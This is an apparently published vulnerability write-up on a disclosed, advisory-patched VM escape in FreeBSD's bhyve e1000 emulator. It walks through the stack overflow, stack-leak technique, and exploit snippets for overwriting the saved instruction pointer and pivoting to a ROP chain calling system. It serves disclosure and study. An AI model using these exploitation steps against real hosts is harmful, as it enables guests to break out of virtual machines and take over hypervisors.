Escaping from bhyve
Introduction
Back in 2017, I wrote a paper in Phrack magazine about a VM escape in Qemu. The vulnerabilities were present in two network card device emulators: RTL8139 and PCNET. After the publication of Reno Robert's paper on the same Phrack issue about a couple of VM escape in bhyve, I decided to audit the code of the available network device emulators.
The bug in the AMD PCNET emulator is related to a checksum inserted beyond the limit of the allocated buffer. I found a similar bug in the PCI E82545 emulator where the UDP packet checksum is inserted at a controlled index. In the following, I will present how I turned a two-bytes stack-based overflow into code execution.
Environment
As I don't have a FreeBSD installed on my machine, I'm running bhyve hypervisor inside a QEMU/KVM virtual machine with nested virtualization enabled. The host machine is running FreeBSD 13.0-RELEASE releng/13.0. The guest virtual machine is also a FreeBSD managed with vm-bhyve with the following configuration:
root@freelsd:~ # vm configure freebsd
loader="bhyveload"
cpu=1
memory=2048M
network0_type="e1000"
network0_switch="target"
network0_mac="58:9c:fc:0f:b4:44"
network1_type="virtio-net"
network1_switch="ssh"
network1_mac="58:9c:fc:04:49:ac"
disk0_type="virtio-blk"
disk0_name="disk0.img"
The E82545 emulator
Packet transmission
The function e82545_transmit
(pci_e82545.c) is responsible for transmitting packets. The function iterates over the ring buffer of packet descriptors and fills a buffer of iovec
structures:
There are three types of packet descriptors:
- E1000_TXD_TYP_C: This type is the context descriptor. The associated data structure (
e1000_context_desc
) encodes information such as the header and payload lengths as well as IP and TCP checksum offsets. - E1000_TXD_TYP_D: This type is the data descriptor. The related data structure (
e1000_data_desc
) holds a pointer to the physical address of the data buffer. - E1000_TXD_TYP_L: This is type is the legacy data descriptor.
Packets are submitted by a call to e82545_transmit_backend that ends up by invoking the following function:
/*
* Called to send a buffer chain out to the tap device
*/
static ssize_t
tap_send(struct net_backend *be, const struct iovec *iov, int iovcnt)
{
return (writev(be->fd, iov, iovcnt));
}
NIC setup
In order to trigger our vulnerability, we need to setup first the network card. The e1000 network adapters have several registers that can be configured through in*()
and out*()
primitives (from machine/cpufunc.h). Please note that these functions do not have the same prototype in the Linux header file sys/io.h. I got some crashes before figuring out that the parameters port and data are swapped in FreeBSD.
The only thing we need here is to configure the ring buffer of TX descriptors:
tx_size = tx_nb * sizeof(union e1000_tx_udesc);
tx_ring = aligned_alloc(PAGE_SIZE, tx_size);
memset(tx_ring, 0, tx_size);
for(int i = 0; i < tx_nb; i++) {
buffer = aligned_alloc(PAGE_SIZE, BUFF_SIZE);
memcpy(buffer, packet, sizeof(packet));
tx_buffer[i] = buffer;
addr = gva_to_gpa(buffer);
warnx("TX ring buffer at 0x%"PRIx64"\n", addr);
tx_ring[i].dd.buffer_addr = addr;
};
For each TX descriptor, we need to provide the physical address of the buffer holding the data to transmit. I didn't find any exposed interface in userland (e.g. no pagemap in /proc) to convert a virtual address into a physical address. So I wrote a small kernel module (pt.ko
) that performs the resolution:
#include <sys/types.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/kernel.h>
#include <sys/sysproto.h>
#include <sys/systm.h>
#include <vm/vm.h>
#include <vm/pmap.h>
#include <vm/vm_map.h>
struct pt_args
{
vm_offset_t vaddr;
uint64_t *res;
};
static int pt(struct thread *td, void *args)
{
struct pmap *pmap;
struct pt_args *user = args;
vm_offset_t vaddr = user->vaddr;
uint64_t *res = user->res;
uint64_t paddr;
pmap = &td->td_proc->p_vmspace->vm_pmap;
paddr = pmap_extract(pmap, vaddr);
return copyout(&paddr, res, sizeof(uint64_t));
}
static struct sysent pt_sysent = {
.sy_narg = 2,
.sy_call = pt
};
static int offset=NO_SYSCALL;
static int load(struct module *module, int cmd, void *arg)
{
int error=0;
switch(cmd) {
case MOD_LOAD:
uprintf("loading syscall at offset %d\n", offset);
break;
case MOD_UNLOAD:
uprintf("unloading syscall from offset %d\n", offset);
break;
default:
error=EOPNOTSUPP;
break;
}
return error;
}
SYSCALL_MODULE(pt, &offset, &pt_sysent, load, NULL);
The last step is to update the descriptor table address in the adapter:
warnx("disable TX");
e1000_tx_disable();
addr = gva_to_gpa(tx_ring);
warnx("update TX desc table");
e1000_write_reg(TDBAL, (uint32_t)addr); /* desc table addr, low bits */
e1000_write_reg(TDBAH, addr >> 32); /* desc table addr, hi 32-bits */
e1000_write_reg(TDLEN, tx_size); /* # descriptors in bytes */
e1000_write_reg(TDH, 0); /*desc table head idx */
warnx("enable TX");
e1000_tx_enable();
The vulnerability
The vulnerability is present in the e82545_transmit
function. As shown by the following snippet of code, if TCP segmentation offload is enabled (e.g. tso == 1), the packet header length (hdrlen
) is retrieved from the packet context descriptor. The code ensures that the length value does not exceed a maximum size of 240 bytes and checks that the length is large enough to insert the VLAN tag, the IP and TCP checksums. However in case of a non TCP packet (e.g. UDP packet), there is no check on the checksum offset (ckinfo[1].ck_off
). The missing check in [1] leads to an OOB read and write in [3] and [4], respectively. The vulnerability allows an attacker to write controlled data (computed checksum) beyond the limit of the packet header allocated on the stack at [2].
e82545_transmit(struct e82545_softc *sc, uint16_t head, uint16_t tail,
uint16_t dsize, uint16_t *rhead, int *tdwb)
{
/* ... */
/* Simple non-TSO case. */
if (!tso) {
/* ... */
} else {
/* In case of TSO header length provided by software. */
hdrlen = sc->esc_txctx.tcp_seg_setup.fields.hdr_len;
if (hdrlen > 240) {
WPRINTF("TSO hdrlen too large: %d", hdrlen);
goto done;
}
if (vlen != 0 && hdrlen < ETHER_ADDR_LEN*2) {
WPRINTF("TSO hdrlen too small for vlan insertion "
"(%d vs %d) -- dropped", hdrlen,
ETHER_ADDR_LEN*2);
goto done;
}
if (hdrlen < ckinfo[0].ck_start + 6 ||
hdrlen < ckinfo[0].ck_off + 2) {
WPRINTF("TSO hdrlen too small for IP fields (%d) "
"-- dropped", hdrlen);
goto done;
}
if (sc->esc_txctx.cmd_and_length & E1000_TXD_CMD_TCP) {
if (hdrlen < ckinfo[1].ck_start + 14 ||
(ckinfo[1].ck_valid &&
hdrlen < ckinfo[1].ck_off + 2)) {
WPRINTF("TSO hdrlen too small for TCP fields "
"(%d) -- dropped", hdrlen);
goto done;
}
} else {
if (hdrlen < ckinfo[1].ck_start + 8) {
WPRINTF("TSO hdrlen too small for UDP fields "
"(%d) -- dropped", hdrlen);
// [1] Missing check on ckinfo[1].ck_off
goto done;
}
}
}
/* Allocate, fill and prepend writable header vector. */
if (hdrlen != 0) {
// [2] Allocation of vulnerable buffer
hdr = __builtin_alloca(hdrlen + vlen);
/* ...*/
}
/* ... */
/* Doing TSO. */
if (ckinfo[1].ck_valid) /* Save partial pseudo-header checksum. */
tcpcs = *(uint16_t *)&hdr[ckinfo[1].ck_off]; // [3] OOB Read
/* ... */
pv = 1;
pvoff = 0;
for (seg = 0, left = paylen; left > 0; seg++, left -= now) {
/* ... */
/* Calculate checksums and transmit. */
if (ckinfo[0].ck_valid) {
*(uint16_t *)&hdr[ckinfo[0].ck_off] = ipcs;
e82545_transmit_checksum(tiov, tiovcnt, &ckinfo[0]);
}
if (ckinfo[1].ck_valid) {
*(uint16_t *)&hdr[ckinfo[1].ck_off] =
e82545_carry(tcpsum); // [4] OOB Write
e82545_transmit_checksum(tiov, tiovcnt, &ckinfo[1]);
}
e82545_transmit_backend(sc, tiov, tiovcnt);
}
/* ... */
}
The vulnerability has been reported to FreeBSD security team on March 7th, 2022. A security advisory has been published one month after the initial report. After disclosing this vulnerability, I noticed that Reno Robert reported a similar issue in 2019 (CVE-2019-5609). Unfortunately, the committed patch was incomplete and did not fix the issue.
VM escape
Memory leak
The vulnerability allows writing two controlled bytes at an arbitrary offset. However, the offset is 1-byte size which limits the exploitation perspective. According to the layout of the stack displayed hereafter, the usual targets (saved instruction pointer, saved frame pointer) are out of reach from the allocated vulnerable buffer. Nonetheless, the hdr
pointer can still be corrupted:
The hdr
pointer is used is the segmentation loop as follows :
pv = 1;
pvoff = 0;
for (seg = 0, left = paylen; left > 0; seg++, left -= now) {
now = MIN(left, mss);
/* Construct IOVs for the segment. */
/* Include whole original header. */
tiov[0].iov_base = hdr;
tiov[0].iov_len = hdrlen;
tiovcnt = 1;
/* Include respective part of payload IOV. */
for (nleft = now; pv < iovcnt && nleft > 0; nleft -= nnow) {
nnow = MIN(nleft, iov[pv].iov_len - pvoff);
tiov[tiovcnt].iov_base = iov[pv].iov_base + pvoff;
tiov[tiovcnt++].iov_len = nnow;
if (pvoff + nnow == iov[pv].iov_len) {
pv++;
pvoff = 0;
} else
pvoff += nnow;
/* ... */
e82545_transmit_backend(sc, tiov, tiovcnt);
}
By adjusting the 2 lower-order bytes of the hdr
pointer, one can leak some portion of the stack content. We can get back the UDP packet containing the leaked memory if packet forwarding is enabled in the host (gateway_enable="YES" in /etc/rc.conf).
Running tcpdump on the guest machine will reveal a bunch of stack pointers:
Code execution
As surprising as it may seem, ASLR is not enabled by default on FreeBSD 13.0-RELEASE #0. There is no need to leak the memory of the bhyve process.
As shown in the previous section, by corrupting the hdr
pointer one can force the host to leak part of the bhyve's process stack. Corrupting the hdr
pointer is convenient especially if we have more that one segment. For instance, we can alter the 2 low-order bytes of the hdr
pointer in the first iteration loop and make use of the multiple writes that update the hdr
buffer during the second iteration loop. The following snippet of code which is responsible for updating the IP header allows us to write a controlled DWORD at a controlled offset:
for (seg = 0, left = paylen; left > 0; seg++, left -= now) {
now = MIN(left, mss);
/* ... */
/* Update IP header. */
if (sc->esc_txctx.cmd_and_length & E1000_TXD_CMD_IP) {
/* IPv4 -- set length and ID */
*(uint16_t *)&hdr[ckinfo[0].ck_start + 2] = htons(hdrlen - ckinfo[0].ck_start + now);
*(uint16_t *)&hdr[ckinfo[0].ck_start + 4] = htons(ipid + seg);
}
/* ... */
}
Please note that the UDP packet will also be updated (payload length, checksum) and this may cause parasite writes.
Using the above modifications on the hdr
buffer, we can overwrite for example the saved instruction pointer as follows:
/* corrupt saved rip */
hdrlen = 32;
hdroff = 0x90;
ipcss = 12;
tucss = 0;
mss = htons(POP_RBP & 0xffff) - hdrlen + ipcss; // WHAT_LOW
paylen = 2 * mss;
pktlen = paylen + hdrlen;
tx_cd.upper_setup.tcp_fields.tucss = tucss;
tx_cd.upper_setup.tcp_fields.tucse = tucss+1;
tx_cd.cmd_and_length = paylen;
tx_cd.cmd_and_length |= E1000_TXD_TYP_C;
tx_cd.cmd_and_length |= E1000_TXD_CMD_IP;
tx_cd.tcp_seg_setup.fields.status = 0;
tx_cd.tcp_seg_setup.fields.hdr_len = hdrlen;
tx_cd.tcp_seg_setup.fields.mss = mss;
write_off = SAVED_RIP_OFF - ipcss - 2;
*(uint16_t *)(tx_buffer[head + 1] + tucss) = ~write_off; // WHERE
*(uint16_t *)(tx_buffer[head + 1] + ipcss + 4) = MAKE_WORD(POP_RBP, 1); // WHAT_HIGH
e1000_tx_transmit(tx_ring, &head, &tx_cd, pktlen);
One could be tempted at first sight to corrupt the saved frame pointer and make it point to the beginning of the original hdr
buffer that stores our ROP chain. However, the function e82545_transmit is called from e82545_tx_thread
that does not return. So instead, we decided to use our relative OOB write primitive multiple times in order to build a ROP chain that calls system. Writing a full ROP chain is still challenging since the stack frame of the calling thread has limited space. We need to take care of the undesired writes to avoid writing beyond the stack limit allocated for the e82545_tx
thread. To overcome these limitations, we can write a small chain that pivot the stack to the beginning of the original hdr
buffer where our payload that is responsible for calling system
is stored.
In order to avoid mixing data used by the write primitive and data used as part of the ROP chain, we need to arrange our payload in the stack first. Prior to exploiting the relative OOB write primitive, we can send a first packet that forces an allocation of a large header (220 bytes is the maximum size that we can allocate), and use a smaller size for subsequent allocations.
Exploiting the OOB write primitives four times allows us to write our ROP chain made of a POP RBB
and LEAVE
gadgets. This minimal stage allows pivoting the stack as shown in the following picture to the address of the initial allocation of the hdr buffer where the payload that calls system
is located:
The exploit code is available in the Synacktiv's Github repository.
Capsicum sandbox
The exploit works on bhyve built without the capsicum sandbox (WITHOUT_CAPSICUM). The capsicum sandbox will prevent running calc as the syscall execve
(and many others) is filtered. I haven't invested time to find a way to bypass the capsicum sandbox. For those who are interested, I strongly encourage the reading of Reno Robert phrack's paper that presents a technique to bypass the sandbox.
Acknowledgement
I would like to thank the FreeBSD security team for handling the vulnerability.